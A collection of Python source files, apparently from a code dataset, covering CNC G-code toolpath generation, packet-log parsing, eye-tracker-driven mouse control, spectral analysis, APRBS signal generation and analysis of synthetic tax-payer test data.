line('G0%s%s%s' % (xstr, ystr, zstr))
def g1(x=None, y=None, z=None):
xstr = ''
ystr = ''
zstr = ''
if x is not None:
xstr = ' X%s' % fmt(x)
if y is not None:
ystr = ' Y%s' % fmt(y)
if z is not None:
zstr = ' Z%s' % fmt(z)
line('G1%s%s%s F%0.3f' % (xstr, ystr, zstr, cnc.fr))
def m0():
line('M0')
def m1():
line('M1')
# Cut rectangle with upper left coordinate given
# Cutter centered on rectangle
def rect_slot_ul(x, y, w, h, com=True, chain=True, leadin='g0'):
if com:
line()
line('(rect_slot_ul X%s Y%s W%s H%s)' % (fmt(x), fmt(y), fmt(w), fmt(h)))
if leadin == 'g0':
g0(x, y)
clear_zn()
elif leadin == 'g1':
g1(x, y)
else:
raise Exception("Oops")
g1(x + w, y + 0)
g1(x + w, y + h)
g1(x + 0, y + h)
g1(x + 0, y + 0)
if chain:
cnc.chain()
# Cut rectangle, compensating to cut inside of it
# Endmill is assumed to be square
def rect_in_ul(x, y, w, h, finishes=1, chain=True, com=True):
if com:
line()
line('(rect_in_ul X%s Y%s W%s H%s)' % (fmt(x), fmt(y), fmt(w), fmt(h)))
# Roughing pass
if finishes:
if finishes != 1:
raise Exception("FIXME")
line('(Rough)')
rect_slot_ul(x + cnc.em/2 + cnc.finish_u, y + cnc.em/2 + cnc.finish_u, w - cnc.em - cnc.finish_u, h - cnc.em - cnc.finish_u, com=False, chain=False)
# Finishing pass
line('(Finish)')
rect_slot_ul(x + cnc.em/2, y + cnc.em/2, w - cnc.em, h - cnc.em, com=False, chain=chain, leadin='g1')
else:
# Finishing pass
rect_slot_ul(x + cnc.em/2, y + cnc.em/2, w - cnc.em, h - cnc.em, com=False, chain=chain)
def rect_in_cent(x, y, w, h, *args, **kwargs):
x0 = x - w/2
y0 = y - h/2
if kwargs.get('com', True):
line()
line('(rect_in_cent X%s Y%s W%s H%s)' % (fmt(x), fmt(y), fmt(w), fmt(h)))
kwargs['com'] = False
rect_in_ul(x0, y0, w, h, *args, **kwargs)
'''
G2: clockwise arc
G3: counterclockwise arc
'''
def circ_cent_slot(x, y, r, cw=False, com=True, leadin='g0', chain=True):
if com:
line()
line('(circ_cent_slot X%sf Y%s R%s)' % (fmt(x), fmt(y), fmt(r)))
# Arbitrarily start at left
x0 = x - r
if leadin == 'g0':
g0(x0, y)
clear_zn()
elif leadin == 'g1':
g1(x0, y)
else:
raise Exception("Oops")
line('G3 I%0.3f F%0.3f' % (r, cnc.fr))
if chain:
cnc.chain()
# Cut circle centered at x, y
# Leaves a hole the size of r
def circ_cent_in(x, y, r):
line()
line('(circ_cent_in X%s Y%s R%s)' % (fmt(x), fmt(y), fmt(r)))
raise Exception("FIXME")
# Cut circle centered at x, y
# Leaves a cylinder the size of r
def circ_cent_out(x, y, r, finishes=1):
line()
line('(circ_cent_out X%s Y%s R%s)' % (fmt(x), fmt(y), fmt(r)))
# Roughing pass
if finishes:
if finishes != 1:
raise Exception("FIXME")
line('(Rough)')
circ_cent_slot(x, y, r + cnc.em + cnc.finish_u, cw=True, com=False, chain=False)
line('(Finish)')
circ_cent_slot(x, y, r + cnc.em, cw=False, com=False, leadin='g1')
else:
circ_cent_slot(x, y, r + cnc.em, cw=False, com=False)
def endrange(start, end, inc, finish=0.001, com=False):
'''Inclusive float range(): ending at end instead of beginning like range does'''
if com:
comment('endrange %0.3f, %0.3f, %0.3f, finish=%0.3f' % (start, end, inc, finish))
ret = []
if inc < 0:
raise ValueError()
if finish:
ret.append(end)
pos = end + finish
else:
pos = end
if start < end:
while pos > start:
ret.append(pos)
pos -= inc
else:
while pos < start:
ret.append(pos)
pos += inc
ret.reverse()
return ret
'''
for cutting a pocket with the edge at the bottom (below y)
pre-chain:
endmill should be below the part edge
it will rapid move x into position and then actuate y
post-chain
endmill will be in lower right corner
align
lr: lower right
goes left right
coordinates relative to align
'''
def pocket_lr(x, y, w, h, finishes=1, finish_only=False):
'''
# clear Y
g0(y=(cnc.em/2 + 0.05))
# Back to X
g0(x=-(x + cnc.em/2))
for y in endrange(-(y + cnc.em / 2), -(y + h - cnc.em / 2), cnc.em/2):
g1(y=y)
g1(x=-(x + w + cnc.em / 2))
# Clear
g0(x=-(x + cnc.em / 2))
'''
comment('pocket_lr X%0.3f Y%0.3f W%0.3F H%0.3F' % (x, y, w, h))
# left, right
# upper, lower
xl = x - w + cnc.em/2
xr = x - cnc.em/2
yu = y - h + cnc.em/2
yl = y - cnc.em/2
finish = 0.005
if finishes:
comment('Finish: %d %0.3f' % (finishes, finish))
# unfinished boundary
if finishes:
xl_uf = xl + finish
xr_uf = xr - finish
yu_uf = yu + finish
yl_uf = yl - finish
else:
xl_uf = xl
xr_uf = xr
yu_uf = yu
yl_uf = yl
line()
comment("chain to lower right corner")
# clear Y
y_clear = y + cnc.em/2 + 0.05
g0(y=y_clear)
for ythis in endrange(y, yu_uf, cnc.em/2, finish=0, com=True):
if finish_only:
continue
line()
comment('y=%.03f' % ythis)
# clear
g0(x=xl_uf)
# feed into material
g1(y=ythis)
# cut
g1(x=xr_uf)
if finish_only:
g0(x=xr_uf)
line()
# cutter is at right
# slowly cut to return y, clearing the nubs
comment('cut nubs')
g1(y=y_clear)
line()
comment('pocket perimeter')
# Now do finishing pass around
# Return known location
# WARNING: right side will have nubs
# clear, moving to lower right avoiding nubs
#g0(x=xl_uf)
#g0(y=y_clear)
#g0(x=xr_uf)
# and dig in for the perimeter cut
#g1(x=xr, y=yl)
# TODO: verify chain
# chain good
# line('M1')
# Now carve out
def perim(delta):
comment('perim w/ delta %0.3f' % delta)
comment('chain to lr')
g1(x=xr - delta)
g1(y=yl - delta)
comment('lr to ur')
g1(xr - delta, yu + delta)
comment('ur to ul')
if finish_only:
g0(xl + delta, yu + delta)
else:
g1(xl + delta, yu + delta)
comment('ul to ll')
g1(xl + delta, yl - delta)
# already cut
#comment('ll to lr')
#g1(xr - delta, yl - delta)
#if finishes:
# perim(finish)
perim(0.0)
# chain to edge
g1(y=y_clear)
```
#### File: uvscada/uvscada/ppro_util.py
```python
from uvscada.ppro import parse
import binascii
import time
import json
def load_logs(fn, progt=5.0, limit=None, convert=True):
return [data for _t, data in gen_logs(fn, progt, limit, convert=convert)]
def load_logst(fn, progt=5.0, limit=None, convert=True):
return list(gen_logs(fn, progt, limit, convert=convert))
def gen_logs(fn, progt=5.0, limit=None, verbose=False, convert=True):
tprint = time.time()
errs = 0
for itr, l in enumerate(open(fn)):
if limit and not limit(itr):
continue
if time.time() - tprint > progt:
print '%d' % itr
tprint = time.time()
l = l.strip()
if not l:
continue
try:
j = json.loads(l)
except:
# Truncated record?
if itr > 1:
continue
raise
raw = binascii.unhexlify(j['data'])
try:
dec = parse(raw, convert=convert)
except ValueError as e:
# Lots of CRC errors
# Ocassional sequence errors
if verbose:
print 'WARNING: %s bad packet: %s' % (itr, e)
errs += 1
continue
except Exception:
print itr
raise
yield (j['t'], dec)
if verbose:
print '%d packet errors' % errs
``` |
{
"source": "JohnDoe02/gaze-ocr",
"score": 3
} |
#### File: gaze-ocr/gaze_ocr/_dragonfly_wrappers.py
```python
import dragonfly
class Mouse(object):
def move(self, coordinates):
dragonfly.Mouse("[{}, {}]".format(*coordinates)).execute()
def click(self):
dragonfly.Mouse("left").execute()
def click_down(self):
dragonfly.Mouse("left:down").execute()
def click_up(self):
dragonfly.Mouse("left:up").execute()
def scroll_down(self, n=1):
dragonfly.Mouse("wheeldown:{}".format(n)).execute()
def scroll_up(self, n=1):
dragonfly.Mouse("wheelup:{}".format(n)).execute()
class Keyboard(object):
def type(self, text):
dragonfly.Text(text.replace("%", "%%")).execute()
def shift_down(self):
dragonfly.Key("shift:down").execute()
def shift_up(self):
dragonfly.Key("shift:up").execute()
def left(self, n=1):
dragonfly.Key("left:{}".format(n)).execute()
def right(self, n=1):
dragonfly.Key("right:{}".format(n)).execute()
class Windows(object):
def get_monitor_size(self):
primary = dragonfly.Monitor.get_all_monitors()[0]
return (primary.rectangle.dx, primary.rectangle.dy)
def get_foreground_window_center(self):
window_position = dragonfly.Window.get_foreground().get_position()
return (window_position.x_center, window_position.y_center)
```
#### File: gaze-ocr/gaze_ocr/eye_tracking.py
```python
import sys
import etpy
from . import _dragonfly_wrappers as dragonfly_wrappers
class EyeTracker(object):
_instance = None
@classmethod
def get_connected_instance(cls, *args, **kwargs):
if not cls._instance:
cls._instance = cls(*args, **kwargs)
if not cls._instance.is_connected:
cls._instance.connect()
return cls._instance
def __init__(self,
tobii_dll_directory,
mouse=dragonfly_wrappers.Mouse(),
keyboard=dragonfly_wrappers.Keyboard(),
windows=dragonfly_wrappers.Windows()):
self._mouse = mouse
self._keyboard = keyboard
self._windows = windows
# Attempt to load eye tracker DLLs.
global clr, Action, Double, Host, GazeTracking
try:
import clr
from System import Action, Double
sys.path.append(tobii_dll_directory)
clr.AddReference("Tobii.Interaction.Model")
clr.AddReference("Tobii.Interaction.Net")
from Tobii.Interaction import Host
from Tobii.Interaction.Framework import GazeTracking
self.is_mock = False
except:
print("Eye tracking libraries are unavailable.")
self.is_mock = True
self._host = None
self._gaze_point = None
self._gaze_state = None
self._screen_scale = (1.0, 1.0)
self._head_rotation = None
self.is_connected = False
self.tobii4c = etpy.Tobii4c()
def connect(self):
if self.is_mock:
return
self._host = Host()
# Connect handlers.
screen_bounds_state = self._host.States.CreateScreenBoundsObserver()
screen_bounds_state.Changed += self._handle_screen_bounds
gaze_state = self._host.States.CreateGazeTrackingObserver()
gaze_state.Changed += self._handle_gaze_state
gaze_points = self._host.Streams.CreateGazePointDataStream()
action = Action[Double, Double, Double](self._handle_gaze_point)
gaze_points.GazePoint(action)
head_pose = self._host.Streams.CreateHeadPoseStream()
head_pose.Next += self._handle_head_pose
self.is_connected = True
print("Eye tracker connected.")
def disconnect(self):
if not self.is_connected:
return
self._host.DisableConnection()
self._host = None
self._gaze_point = None
self._gaze_state = None
self.is_connected = False
print("Eye tracker disconnected.")
def _handle_screen_bounds(self, sender, state):
if not state.IsValid:
print("Ignoring invalid screen bounds.")
return
bounds = state.Value
monitor_size = self._windows.get_monitor_size()
self._screen_scale = (monitor_size[0] / float(bounds.Width),
monitor_size[1] / float(bounds.Height))
def _handle_gaze_state(self, sender, state):
if not state.IsValid:
print("Ignoring invalid gaze state.")
return
self._gaze_state = state.Value
def _handle_gaze_point(self, x, y, timestamp):
self._gaze_point = (x, y, timestamp)
def _handle_head_pose(self, sender, stream_data):
pose = stream_data.Data
self._head_rotation = (pose.HeadRotation.X,
pose.HeadRotation.Y,
pose.HeadRotation.Z)
def has_gaze_point(self):
return (not self.is_mock and
self._gaze_state == GazeTracking.GazeTracked and
self._gaze_point)
def get_gaze_point_or_default(self):
self._gaze_point = self.tobii4c.getGaze()
print("gaze point x: ", self._gaze_point[0])
print("gaze point y: ", self._gaze_point[1])
if self.has_gaze_point() or True:
return (1920 + self._gaze_point[0] * self._screen_scale[0] * 1920,
self._gaze_point[1] * self._screen_scale[1] * 1200)
else:
return self._windows.get_foreground_window_center()
def print_gaze_point(self):
if not self.has_gaze_point():
print("No valid gaze point.")
return
print("Gaze point: (%f, %f)" % self._gaze_point[:2])
def move_to_gaze_point(self, offset=(0, 0)):
gaze = self.get_gaze_point_or_default()
x = max(0, int(gaze[0]) + offset[0])
y = max(0, int(gaze[1]) + offset[1])
self._mouse.move((x, y))
def type_gaze_point(self, format):
self._keyboard.type(format % self.get_gaze_point_or_default()).execute()
def get_head_rotation_or_default(self):
return self._head_rotation or (0, 0, 0)
``` |
{
"source": "JohnDoe2576/MRAC",
"score": 2
} |
#### File: JohnDoe2576/MRAC/Data_Handler.py
```python
import numpy as np
import pandas as pd
import pickle as pkl
import bz2
class Data_Handler:
def __init__(self, dat_par):
self.filename = dat_par.filename
self.fileno = dat_par.fileno
def loaddata(self):
# Open file object
comp_file = self.filename + "_" + self.fileno + ".bz2"
f = bz2.BZ2File(comp_file, 'rb')
# Unpickle data
dat = pkl.load(f)
f.close()
# Extracting data
t = np.array(dat['t'])
u = np.array(dat['u'])
y = np.array(dat['y'])
# Return obtained data
return t,u,y
def savedata(self, t, u, y):
# Plug data in pandas DataFrame
dat = pd.DataFrame({'t':t, 'u':u, 'y':y})
# Compress using bzip2 format
comp_file = self.filename + "_" + self.fileno + ".bz2"
f = bz2.BZ2File(comp_file, 'wb')
# Pickle data
pkl.dump(dat, f)
f.close()
def cal_psd( x, **parms ):
# Assumptions:
# 1. 'x' is a 2D array of data measured/sampled at unformly spaced
# instants. The data measured/sampled from a particular channel
# is given along axis0, and channel numbering is given along
# axis1.
# 2. In all cases, the code returns PSD in the positive direction
# of f-axis, and then doubling the energy in it to account for
# the energy inthe negative direction of f-axis. This is based
# on an assumption of typical symmetries of PSD(-f) = PSD(+f).
# Also note that, in the event that 'x' is complex, x(-f) ~= x(f).
# 3. Each channel data is divided into blocks of size 'nfft'with a
# 'overlap_pcnt' percentage of overlap between them, and the PSD
# over each of the blocks are averaged. Furthermore, to avoid a
# situation where few samples being unused towards the end, the
# overlap between last and last-but-one block can be larger.
# 4. PSD has units ((Unit of 'x')^**2)/(\Delta Hz). '\Delta Hz'
# is a reflection of the fact that PSD is the density per unit
# width of the frequency bins. In other words, \int {(PSD) (df)}
# is the power of the signal irrespective of frequency parameters
# like 'nfft' or 'fs'
#
# Input parameters:
# x: Time-series (2D array)
# nfft: Frequency points used to calculate DFT
# fs: Sampling frequency
# window: Windowing function
# overlap_pcnt: Percentage overlap between successive blocks
#
# Output parameters:
# PSD: Power Spectral Density in ((Units of x) ** 2)/(Delta Hz)
# f: Frequency axis
# Extracting parameters
nfft = parms['nfft'] # Number of frequency points
fs = parms['fs'] # Sampling frequency
window = parms['window'] # Windowing function
overlap_pcnt = parms['ovlp_pcnt'] # Percentage of overlap
# Get windowing function and weights (for normalization later)
dat_wndw = np.diag(window(nfft))
wndw_weight = np.mean(np.power(dat_wndw,2))
# Return distinct non-negative frequencies less than Nyquist
nfrq = int(np.ceil((nfft+1)/2))
# Create frequency axis
f = np.arange(0,nfrq,1)*(fs/nfft)
# Samples to overlap between successive blocks
noverlap = 0.01 * nfft * overlap_pcnt
# Samples by which one block is shifted from next
blk_shift = nfft - noverlap
# Number of samples
n_smpl = len(x)
# Number of blocks to average over
nblks = np.ceil((n_smpl - noverlap)/blk_shift)
# Calculating Power Spectral Density
# ----------------------------------
#
# Pre-initializng PSD matrix
PSD = np.zeros(x.shape)
PSD = PSD[0:nfft,]
for blk in range(0,int(nblks)):
# Starting index of each block
blk_strt_idx = int(min([(blk*blk_shift + nfft), n_smpl]) - nfft)
# Indices of current block
blk_curr_idx = np.arange(0,int(nfft),dtype='int16') + blk_strt_idx
# Convolve window function with each block and take the Fourier transform
p_f = np.fft.fft(np.matmul(dat_wndw,x[blk_curr_idx,]),n=nfft,axis=0)
# Add square of DFT to running sum
PSD = PSD + np.power( np.abs(p_f), 2 )
# Average out values from all blocks
PSD = PSD/nblks
# Account for neglected energy (Refer Assumption 2)
# -------------------------------------------------
#
# Axis folding:
# 1. Selecting positive frequency axis
# 2. Knocking-off 'Zero' and 'Nyquist' frequencies
nfrq_pos = int(np.floor((nfft+1)/2) - 1)
nfrq_pos_idx = np.array(range(0,nfrq_pos))
# Double the energy (Assumption 2)
PSD[(1+nfrq_pos_idx),] = PSD[(1+nfrq_pos_idx),] + PSD[(-1+1)-nfrq_pos_idx]
# Crucial normalizations
# ----------------------
#
# 1. Make PSD independent of frequency parameters: 'fs' & 'nfft'
# 2. Account for windowing
PSD = PSD[0:nfrq,]/(nfft*fs*wndw_weight)
# Return frequency axis and calculated PSD
return f,PSD
```
#### File: JohnDoe2576/MRAC/Parameters.py
```python
class Parameters:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def info(self):
print("The parameters, and data-type are: ")
for key,values in self.__dict__.items():
print("{} = {}, {}\n".format(key, values, type(values)))
``` |
{
"source": "JohnDoe2576/MyPythonCodes",
"score": 4
} |
#### File: JohnDoe2576/MyPythonCodes/Excite.py
```python
import numpy as np
import matplotlib.pyplot as plt
def aprbs(**parms):
# Generate an Amplitude modulated Pseudo-Random Binary Sequence (APRBS)
#
# The Pseudo-Random Binary Sequence (PRBS) is extensively used as an
# excitation signal for System Identification of linear systems. It is
# characterized by randomly delayed shifts in amplitude between a
# user-defined minimum and maximum. These delayed shifts are usually
# range-bound, and are very helpful in capturing the system behaviour
# close to the operating frequency of the system.
#
# A nonlinear system usually will have different behaviour at different
# amplitudes and cannot be predicted with the princlipe of superposition.
# Hence, the excitation signal also need to be modified to accomodate
# for capturing system behaviour at different amplitudes. The APRBS is
# an extension of PRBS by introducing randomly delayed shifts to random
# levels of range-bound amplitudes (rather than between a maximum and
# minimum).
#
# Input parameters:
# n_samples: Number of required samples
# alpha: tuple of (min_amplitude, max_amplitude)
# tau: tuple of (min_delay, max_delay)
# Extract signal parameters
n_samples = parms['n_samples'] # Number of samples
tau = parms['tau'] # Delay vector
alpha = parms['alpha'] # Amplitude vector
# Convert to usable parameters
tau_min = tau[0]
tau_max = tau[1]
tau_range = tau_max - tau_min
alpha_min = alpha[0]
alpha_max = alpha[1]
alpha_range = alpha_max - alpha_min
# Initialize arrays
tau_array = np.zeros((n_samples),dtype=int)
alpha_array = np.zeros((n_samples))
signal = np.zeros((n_samples))
# Initialize counters
sample_count = 0
shift_count = 0
while sample_count < n_samples:
# Generate a random shift to perturb 'tau' and 'alpha'
tau_shift = np.random.uniform(0.0, 1.0, 1)
alpha_shift = np.random.uniform(0.0, 1.0, 1)
# Introduce the random delay such that it range bound between 'tau_min' and 'tau_max'
tau_array[shift_count] = np.fix(tau_min + (tau_shift * tau_range) ).astype(int)
alpha_array[shift_count] = alpha_min + (alpha_shift * alpha_range)
# Update counters
sample_count += tau_array[shift_count]
shift_count += 1
tau_array[shift_count-1] -= (sample_count - n_samples)
idx = 0
for i in range(0,shift_count):
idx_tmp = idx + np.arange(0,tau_array[i],1,dtype=int)
signal[idx_tmp] = alpha_array[i]
idx = idx + tau_array[i]
return signal
# Time parameters
t0 = 0. # Start time
dt = 0.01 # Time step
t1 = 100. # End time
# Time vector
t = np.arange(t0, t1, dt)
# Signal parameters
n_samples = len(t)
alpha = (-2.5, 2.5)
tau = tuple(np.array([dt, 1.])/dt)
u = aprbs(n_samples=n_samples, alpha=alpha, tau=tau)
plt.plot(t,u)
plt.show()
``` |
{
"source": "john-doe-3141592653/XXX",
"score": 4
} |
#### File: PLEDGE/tax/analysis_tax.py
```python
import sys
class Physical_person():
def __init__(self, by, dr, dt, ad):
self.birth_year = by
self.disability_rate = dr
self.disability_type = dt
self.address = ad
def __repr__(self):
return "birth_year: " + str(self.birth_year) + "\n" +\
"disability_rate: " + str(self.disability_rate) + "\n" +\
"disability_type: " + str(self.disability_type) + "\n" +\
"address: " + str(self.address) + "\n"
class Tax_payer(Physical_person):
def __init__(self, by, dr, dt, ad, ir):
Physical_person.__init__(self, by, dr, dt, ad)
self.is_resident = ir
self.children = []
self.income_pension = []
self.income_employment = []
self.income_other = []
def __repr__(self):
return Physical_person.__repr__(self) +\
"is_resident: " + str(self.is_resident) + "\n" +\
"nb_child: " + str(len(self.children)) + "\n" +\
"income_pension: " + str(self.income_pension) + "\n" +\
"income_employment: " + str(self.income_employment) + "\n" +\
"income_other: " + str(self.income_other) + "\n"
class Child(Physical_person):
def __init__(self, by, dr, dt, ad):
Physical_person.__init__(self, by, dr, dt, ad)
def __repr__(self):
return Physical_person.__repr__(self)
def return_interval(param, name):
#print(name + ": " + str(param))
if 0 <= param < 0.33:
return "True;False;False"
elif 0.33 <= param <= 0.67:
return "False;True;False"
elif 0.67 < param <= 1:
return "False;False;True"
else:
print("ERROR: invalid " + name)
exit()
def return_interval_array(param, name):
#print(name + ": " + str(param))
L = False
M = False
H = False
for p in param:
if 0 <= p < 0.33:
L = True
elif 0.33 <= p <= 0.67:
M = True
elif 0.67 < p <= 1:
H = True
else:
print("ERROR: invalid " + name)
exit()
return str(L) + ";" + str(M) + ";" + str(H)
def analyse_nb_tax_payer():
return return_interval((nb_tax_payer-1)/100, "nb_tax_payer")
def analyse_birth_year():
tmp = []
for t in tax_payer_array:
tmp.append((t.birth_year-1920)/100)
return return_interval_array(tmp, "birth_year")
def analyse_disability_rate():
tmp = []
for t in tax_payer_array:
tmp.append(t.disability_rate)
return return_interval_array(tmp, "disability_rate")
def analyse_disability_type():
type_none = False
type_vision = False
type_a = False
for t in tax_payer_array:
if t.disability_type == "None":
type_none = True
elif t.disability_type == "Vision":
type_vision = True
else:
type_a = True
return str(type_none) + ";" + str(type_vision) + ";" + str(type_a)
def analyse_is_resident():
tr = False
fa = False
for t in tax_payer_array:
if t.is_resident == "True":
tr = True
else:
fa = True
return str(tr) + ";" + str(fa)
def analyse_tax_payer_nb_address():
tmp = []
for t in tax_payer_array:
tmp.append((len(t.address)-1)/2)
return return_interval_array(tmp, "tax_payer_nb_address")
def analyse_tax_payer_address():
lu = False
fr = False
be = False
de = False
ot = False
for t in tax_payer_array:
for a in t.address:
if a == "LU":
lu = True
elif a == "FR":
fr = True
elif a == "BE":
be = True
elif a == "DE":
de = True
else:
ot = True
return str(lu) + ";" + str(fr) + ";" + str(be) + ";" + str(de) + ";" + str(ot)
def analyse_nb_child():
zer = False
one = False
two = False
thr = False
for t in tax_payer_array:
nb_child = len(t.children)
if nb_child == 0:
zer = True
elif nb_child == 1:
one = True
elif nb_child == 2:
two = True
else:
thr = True
return str(zer) + ";" + str(one) + ";" + str(two) + ";" + str(thr)
def analyse_child_birth_year():
tmp = []
for t in tax_payer_array:
for c in t.children:
tmp.append((c.birth_year-1920)/100)
return return_interval_array(tmp, "child_birth_year")
def analyse_child_disability_rate():
tmp = []
for t in tax_payer_array:
for c in t.children:
tmp.append(t.disability_rate)
return return_interval_array(tmp, "child_disability_rate")
def analyse_child_disability_type():
type_none = False
type_vision = False
type_a = False
for t in tax_payer_array:
for c in t.children:
if c.disability_type == "None":
type_none = True
elif c.disability_type == "Vision":
type_vision = True
else:
type_a = True
return str(type_none) + ";" + str(type_vision) + ";" + str(type_a)
def analyse_child_nb_address():
tmp = []
for t in tax_payer_array:
for c in t.children:
tmp.append((len(t.address)-0.5)/3)
return return_interval_array(tmp, "child_nb_address")
def analyse_child_address():
lu = False
fr = False
be = False
de = False
ot = False
for t in tax_payer_array:
for c in t.children:
for a in t.address:
if a == "LU":
lu = True
elif a == "FR":
fr = True
elif a == "BE":
be = True
elif a == "DE":
de = True
else:
ot = True
return str(lu) + ";" + str(fr) + ";" + str(be) + ";" + str(de) + ";" + str(ot)
def analyse_nb_pension():
zer = False
one = False
two = False
thr = False
for t in tax_payer_array:
nb_pension = len(t.income_pension)
if nb_pension == 0:
zer = True
elif nb_pension == 1:
one = True
elif nb_pension == 2:
two = True
else:
thr = True
return str(zer) + ";" + str(one) + ";" + str(two) + ";" + str(thr)
def analyse_nb_employment():
zer = False
one = False
two = False
thr = False
for t in tax_payer_array:
nb_employment = len(t.income_employment)
if nb_employment == 0:
zer = True
elif nb_employment == 1:
one = True
elif nb_employment == 2:
two = True
else:
thr = True
return str(zer) + ";" + str(one) + ";" + str(two) + ";" + str(thr)
def analyse_nb_other():
zer = False
one = False
two = False
thr = False
for t in tax_payer_array:
nb_other = len(t.income_other)
if nb_other == 0:
zer = True
elif nb_other == 1:
one = True
elif nb_other == 2:
two = True
else:
thr = True
return str(zer) + ";" + str(one) + ";" + str(two) + ";" + str(thr)
def analyse_pension_is_local():
tr = False
fa = False
for t in tax_payer_array:
for i in t.income_pension:
if i == "True":
tr = True
else:
fa = True
return str(tr) + ";" + str(fa)
def analyse_employment_is_local():
tr = False
fa = False
for t in tax_payer_array:
for i in t.income_employment:
if i == "True":
tr = True
else:
fa = True
return str(tr) + ";" + str(fa)
def analyse_other_is_local():
tr = False
fa = False
for t in tax_payer_array:
for i in t.income_other:
if i == "True":
tr = True
else:
fa = True
return str(tr) + ";" + str(fa)
def analyse_nb_income():
tmp = []
for t in tax_payer_array:
tmp.append((len(t.income_pension) + len(t.income_employment) + len(t.income_other) - 1)/2)
return return_interval_array(tmp, "nb_income")
def analyse_lu_address():
no_lu = False
lu = False
all_lu = False
for t in tax_payer_array:
counter = 0
for a in t.address:
if a == "LU":
counter += 1
if counter == len(t.address):
all_lu = True
elif counter == 0:
no_lu = True
else:
lu = True
return str(no_lu) + ";" + str(lu) + ";" + str(all_lu)
def analyse_c4():
pension_lu = False
employment_lu = False
other_lu = False
for t in tax_payer_array:
tmp = False
for a in t.address:
if a == "LU":
tmp = True
if tmp:
for i in t.income_pension:
if i == "True":
pension_lu = True
for i in t.income_employment:
if i == "True":
employment_lu = True
for i in t.income_other:
if i == "True":
other_lu = True
return str(pension_lu) + ";" + str(employment_lu) + ";" + str(other_lu)
tax_payer_array = []
with open(sys.argv[1] + "tax.csv", "r") as f:
nb_tax_payer = int(f.readline()[:-1])
for i in range(nb_tax_payer):
tmp = f.readline()[:-1].split(";")
address = f.readline()[:-1].split(";")
t = Tax_payer(int(tmp[0]), float(tmp[1]), tmp[2], address, tmp[3])
nb_child = int(f.readline()[:-1])
for j in range(nb_child):
tmp = f.readline()[:-1].split(";")
address = f.readline()[:-1].split(";")
c = Child(int(tmp[0]), float(tmp[1]), tmp[2], address)
t.children.append(c)
nb_income_pension = int(f.readline()[:-1])
if nb_income_pension > 0:
t.income_pension = f.readline()[:-1].split(";")
nb_income_employment = int(f.readline()[:-1])
if nb_income_employment > 0:
t.income_employment = f.readline()[:-1].split(";")
nb_income_other = int(f.readline()[:-1])
if nb_income_other > 0:
t.income_other = f.readline()[:-1].split(";")
tax_payer_array.append(t)
with open(sys.argv[2] + "analysis.csv", "a") as f:
f.write(analyse_nb_tax_payer() + ";" + analyse_birth_year() + ";" + analyse_disability_rate() + ";" + analyse_disability_type() + ";" + analyse_is_resident() + ";" + analyse_tax_payer_nb_address() + ";" + analyse_tax_payer_address() + ";" + analyse_nb_child() + ";" + analyse_child_birth_year() + ";" + analyse_child_disability_rate() + ";" + analyse_child_disability_type() + ";" + analyse_child_nb_address() + ";" + analyse_child_address() + ";" + analyse_nb_pension() + ";" + analyse_nb_employment() + ";" + analyse_nb_other() + ";" + analyse_pension_is_local() + ";" + analyse_employment_is_local() + ";" + analyse_other_is_local() + ";" + analyse_nb_income() + ";" + analyse_lu_address() + ";" + analyse_c4() + "\n")
```
#### File: tax/data_transformation_scripts/create_tax_csv.py
```python
import statistics as stat
import os
def array_to_string(array):
res = ""
for a in array:
res += str(a) + ";"
return res[:-1] + "\n"
for i in range(10):
for j in range(100):
none_id = ""
vision_id = ""
a_id = ""
fr_id = ""
lu_id = ""
de_id = ""
be_id = ""
other_id = ""
nb_tax_payer = -1
disability_type = []
is_resident = []
address = []
income = []
country = {}
is_local = {}
nb_none = -1
nb_vision = -1
nb_a = -1
line_counter = 0
previous_lines = []
save_line_address = 0
save_line_income = 0
tmp_address = []
tmp_income = []
with open("./" + str(i) + "/test_case_" + str(j) + "/tax.uml", "r") as f:
for line in f:
line_counter += 1
if "Tax_payer" in line:
nb_tax_payer += 1
if "None" in line and "ownedLiteral" in line:
none_id = line.split(" ")[5][8:][:-1]
elif "Vision" in line and "ownedLiteral" in line:
vision_id = line.split(" ")[5][8:][:-1]
elif "\"A\"" in line and "ownedLiteral" in line:
a_id = line.split(" ")[5][8:][:-1]
elif "\"FR\"" in line and "ownedLiteral" in line:
fr_id = line.split(" ")[5][8:][:-1]
elif "\"LU\"" in line and "ownedLiteral" in line:
lu_id = line.split(" ")[5][8:][:-1]
elif "\"DE\"" in line and "ownedLiteral" in line:
de_id = line.split(" ")[5][8:][:-1]
elif "\"BE\"" in line and "ownedLiteral" in line:
be_id = line.split(" ")[5][8:][:-1]
elif "\"Other\"" in line and "ownedLiteral" in line:
other_id = line.split(" ")[5][8:][:-1]
elif none_id != "" and none_id in line:
nb_none += 1
if nb_none >= 0:
disability_type.append("none")
elif vision_id != "" and vision_id in line:
nb_vision += 1
if nb_vision >= 0:
disability_type.append("vision")
elif a_id != "" and a_id in line:
nb_a += 1
if nb_a >= 0:
disability_type.append("a")
elif "is_resident" in line and not "ownedAttribute" in line:
if "value=" in line:
is_resident.append(True)
else:
is_resident.append(False)
elif "address" in line and "instance" in line:
tmp = line.split(" ")[10][10:][:-4]
if save_line_address == 0:
save_line_address = line_counter
if line_counter < save_line_address + 3:
tmp_address.append(tmp)
else:
address.append(tmp_address)
tmp_address = []
tmp_address.append(tmp)
save_line_address = line_counter
elif "country" in line:
if not " type" in line:
tmp = line.split(" ")[10][10:][:-4]
if tmp == fr_id:
tmp = "FR"
elif tmp == lu_id:
tmp = "LU"
elif tmp == de_id:
tmp = "DE"
elif tmp == be_id:
tmp = "BE"
else #other
tmp = "OTHER"
country[previous_lines[1].split(" ")[4][8:][:-1]] = tmp
elif "income" in line and "instance" in line and not "Tax_card" in previous_lines[1]:
tmp = line.split(" ")[10][10:][:-4]
if save_line_income == 0:
save_line_income = line_counter
if line_counter < save_line_income + 3:
tmp_income.append(tmp)
else:
income.append(tmp_income)
tmp_income = []
tmp_income.append(tmp)
save_line_income = line_counter
elif "is_local" in line and "Pension" in previous_lines[1]:
if "value=" in line:
tmp = ("P", line.split(" ")[-1][7:][:-4])
else:
tmp = ("P", "false")
is_local[previous_lines[1].split(" ")[4][8:][:-1]] = tmp
elif "is_local" in line and "Employment" in previous_lines[1]:
if "value=" in line:
tmp = ("E", line.split(" ")[-1][7:][:-4])
else:
tmp = ("E", "false")
is_local[previous_lines[1].split(" ")[4][8:][:-1]] = tmp
elif "is_local" in line and "Other" in previous_lines[1]:
if "value=" in line:
tmp = ("O", line.split(" ")[-1][7:][:-4])
else:
tmp = ("O", "false")
